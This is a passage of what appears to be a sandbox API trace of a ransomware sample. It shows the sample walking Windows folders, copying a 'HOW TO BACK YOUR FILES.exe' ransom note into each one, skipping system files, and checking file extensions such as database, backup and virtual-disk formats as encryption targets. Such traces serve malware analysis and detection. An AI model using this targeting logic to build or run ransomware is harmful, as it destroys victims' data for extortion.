dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.491] GetLastError () returned 0x0 [0074.491] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.491] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.491] CloseHandle (hObject=0x15c) returned 1 [0074.491] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.492] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.492] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.492] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.492] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.492] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.492] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.492] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.492] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.492] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.492] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.492] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c172e60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.492] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.492] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="aoldtz.exe") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2=".") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="..") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="windows") returned -1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="bootmgr") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="temp") returned -1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="pagefile.sys") returned -1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="boot") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="ids.txt") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="ntuser.dat") returned 1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="perflogs") returned -1 [0074.492] lstrcmpiW (lpString1="packages", lpString2="MSBuild") returned 1 [0074.492] lstrlenW (lpString="packages") returned 8 [0074.492] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\*") returned 84 [0074.492] lstrcpyW (in: lpString1=0x2cce4a6, lpString2="packages" | out: lpString1="packages") returned="packages" [0074.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0074.492] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb8) returned 0x31efc8 [0074.492] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d25c8 [0074.493] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="packages", cAlternateFileName="")) returned 0 [0074.493] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.493] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0074.493] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0074.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31efc8 | out: hHeap=0x2b0000) returned 1 [0074.493] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0074.493] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned 91 [0074.493] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages") returned="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages" [0074.493] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.493] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.493] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.493] GetLastError () returned 0x0 [0074.493] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.494] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.494] CloseHandle (hObject=0x15c) returned 1 [0074.494] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.494] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.494] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.494] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.494] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.494] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.494] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c172e60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.494] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.494] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.494] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.494] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.494] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c172e60, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c172e60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0074.494] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0074.494] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="aoldtz.exe") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2=".") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="..") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="windows") returned -1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="bootmgr") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="temp") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="pagefile.sys") returned 1 [0074.494] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="boot") returned 1 [0074.495] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ids.txt") returned 1 [0074.495] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="ntuser.dat") returned 1 [0074.495] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="perflogs") returned 1 [0074.495] lstrcmpiW (lpString1="vcRuntimeAdditional_x86", lpString2="MSBuild") returned 1 [0074.495] lstrlenW (lpString="vcRuntimeAdditional_x86") returned 23 [0074.495] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\*") returned 93 [0074.495] lstrcpyW (in: lpString1=0x2cce4b8, lpString2="vcRuntimeAdditional_x86" | out: lpString1="vcRuntimeAdditional_x86") returned="vcRuntimeAdditional_x86" [0074.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2d2580 [0074.495] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe8) returned 0x2c8eb8 [0074.495] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2d2588 | out: ListHead=0x2e7710, ListEntry=0x2d2588) returned 0x2d25c8 [0074.495] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vcRuntimeAdditional_x86", cAlternateFileName="VCRUNT~1")) returned 0 [0074.495] FindClose (in: hFindFile=0x2cd0e8 | out: hFindFile=0x2cd0e8) returned 1 [0074.495] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2d2588 [0074.495] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0074.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0074.495] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0074.495] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned 115 [0074.495] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" | out: lpString1="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86") returned="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86" [0074.495] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0074.495] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\package cache\\{b175520c-86a2-35a7-8619-86dc379688b9}v11.0.61030\\packages\\vcruntimeadditional_x86\\how to back your files.exe"), bFailIfExists=1) returned 0 [0074.496] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0074.496] GetLastError () returned 0x0 [0074.496] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0074.496] ReadFile (in: hFile=0x15c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0074.496] CloseHandle (hObject=0x15c) returned 1 [0074.496] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0074.496] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0074.496] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0074.496] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.496] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0074.496] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0074.496] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xedbebcc0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0x4c198fc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c198fc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.496] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.496] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0074.496] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0074.496] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0074.496] FindNextFileW (in: hFindFile=0x2cd0e8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8aae6600, ftCreationTime.dwHighDateTime=0x1ced4d9, ftLastAccessTime.dwLowDateTime=0x8aae6600, ftLastAccessTime.dwHighDateTime=0x1ced4d9, ftLastWriteTime.dwLowDateTime=0x8aae6600, ftLastWriteTime.dwHighDateTime=0x1ced4d9, nFileSizeHigh=0x0, nFileSizeLow=0x4ea418, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cab1.cab", cAlternateFileName="")) returned 1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="aoldtz.exe") returned 1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2=".") returned 1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="..") returned 1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="windows") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="bootmgr") returned 1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="temp") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="pagefile.sys") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="boot") returned 1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="ids.txt") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="ntuser.dat") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="perflogs") returned -1 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2="MSBuild") returned -1 [0074.497] lstrlenW (lpString="cab1.cab") returned 8 [0074.497] lstrlenW (lpString="C:\\Users\\All Users\\Package Cache\\{B175520C-86A2-35A7-8619-86DC379688B9}v11.0.61030\\packages\\vcRuntimeAdditional_x86\\*") returned 117 [0074.497] lstrcpyW (in: lpString1=0x2cce4e8, lpString2="cab1.cab" | out: lpString1="cab1.cab") returned="cab1.cab" [0074.497] lstrlenW (lpString="cab1.cab") returned 8 [0074.497] lstrlenW (lpString="Ares865") returned 7 [0074.497] lstrcmpiW (lpString1="ab1.cab", lpString2="Ares865") returned -1 [0074.497] lstrlenW (lpString=".dll") returned 4 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2=".dll") returned 1 [0074.497] lstrlenW (lpString=".lnk") returned 4 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2=".lnk") returned 1 [0074.497] lstrlenW (lpString=".ini") returned 4 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2=".ini") returned 1 [0074.497] lstrlenW (lpString=".sys") returned 4 [0074.497] lstrcmpiW (lpString1="cab1.cab", lpString2=".sys") returned 1 [0074.497] lstrlenW (lpString="cab1.cab") returned 8 [0074.497] lstrlenW (lpString="bak") returned 3 [0074.497] lstrcmpiW (lpString1="cab", lpString2="bak") returned 1 [0074.497] lstrlenW (lpString="ba_") returned 3 [0074.497] lstrcmpiW (lpString1="cab", lpString2="ba_") returned 1 [0074.497] lstrlenW (lpString="dbb") returned 3 [0074.497] lstrcmpiW (lpString1="cab", lpString2="dbb") returned -1 [0074.497] lstrlenW (lpString="vmdk") returned 4 [0074.497] lstrcmpiW (lpString1=".cab", lpString2="vmdk") returned -1 [0074.497] lstrlenW (lpString="rar") returned 3 [0074.497] lstrcmpiW (lpString1="cab", lpString2="rar") returned -1 [0074.498] lstrlenW (lpString="zip") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="zip") returned -1 [0074.498] lstrlenW (lpString="tgz") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="tgz") returned -1 [0074.498] lstrlenW (lpString="vbox") returned 4 [0074.498] lstrcmpiW (lpString1=".cab", lpString2="vbox") returned -1 [0074.498] lstrlenW (lpString="vdi") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="vdi") returned -1 [0074.498] lstrlenW (lpString="vhd") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="vhd") returned -1 [0074.498] lstrlenW (lpString="vhdx") returned 4 [0074.498] lstrcmpiW (lpString1=".cab", lpString2="vhdx") returned -1 [0074.498] lstrlenW (lpString="avhd") returned 4 [0074.498] lstrcmpiW (lpString1=".cab", lpString2="avhd") returned -1 [0074.498] lstrlenW (lpString="db") returned 2 [0074.498] lstrcmpiW (lpString1="ab", lpString2="db") returned -1 [0074.498] lstrlenW (lpString="db2") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="db2") returned -1 [0074.498] lstrlenW (lpString="db3") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="db3") returned -1 [0074.498] lstrlenW (lpString="dbf") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="dbf") returned -1 [0074.498] lstrlenW (lpString="mdf") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="mdf") returned -1 [0074.498] lstrlenW (lpString="mdb") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="mdb") returned -1 [0074.498] lstrlenW (lpString="sql") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="sql") returned -1 [0074.498] lstrlenW (lpString="sqlite") returned 6 [0074.498] lstrcmpiW (lpString1="b1.cab", lpString2="sqlite") returned -1 [0074.498] lstrlenW (lpString="sqlite3") returned 7 [0074.498] lstrcmpiW (lpString1="ab1.cab", lpString2="sqlite3") returned -1 [0074.498] lstrlenW (lpString="sqlitedb") returned 8 [0074.498] lstrlenW (lpString="xml") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="xml") returned -1 [0074.498] lstrlenW (lpString="$er") returned 3 [0074.498] lstrcmpiW (lpString1="cab", lpString2="$er") returned 1 [0074.498] lstrlenW (lpString="4dd") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="4dd") returned 1 [0074.499] lstrlenW (lpString="4dl") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="4dl") returned 1 [0074.499] lstrlenW (lpString="^^^") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="^^^") returned 1 [0074.499] lstrlenW (lpString="abs") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="abs") returned 1 [0074.499] lstrlenW (lpString="abx") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="abx") returned 1 [0074.499] lstrlenW (lpString="accdb") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accdb") returned -1 [0074.499] lstrlenW (lpString="accdc") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accdc") returned -1 [0074.499] lstrlenW (lpString="accde") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accde") returned -1 [0074.499] lstrlenW (lpString="accdr") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accdr") returned -1 [0074.499] lstrlenW (lpString="accdt") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accdt") returned -1 [0074.499] lstrlenW (lpString="accdw") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accdw") returned -1 [0074.499] lstrlenW (lpString="accft") returned 5 [0074.499] lstrcmpiW (lpString1="1.cab", lpString2="accft") returned -1 [0074.499] lstrlenW (lpString="adb") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0074.499] lstrlenW (lpString="adb") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="adb") returned 1 [0074.499] lstrlenW (lpString="ade") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="ade") returned 1 [0074.499] lstrlenW (lpString="adf") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="adf") returned 1 [0074.499] lstrlenW (lpString="adn") returned 3 [0074.499] lstrcmpiW (lpString1="cab", lpString2="adn") returned 1 [0074.499] lstrlenW (lpString="adp") returned 3 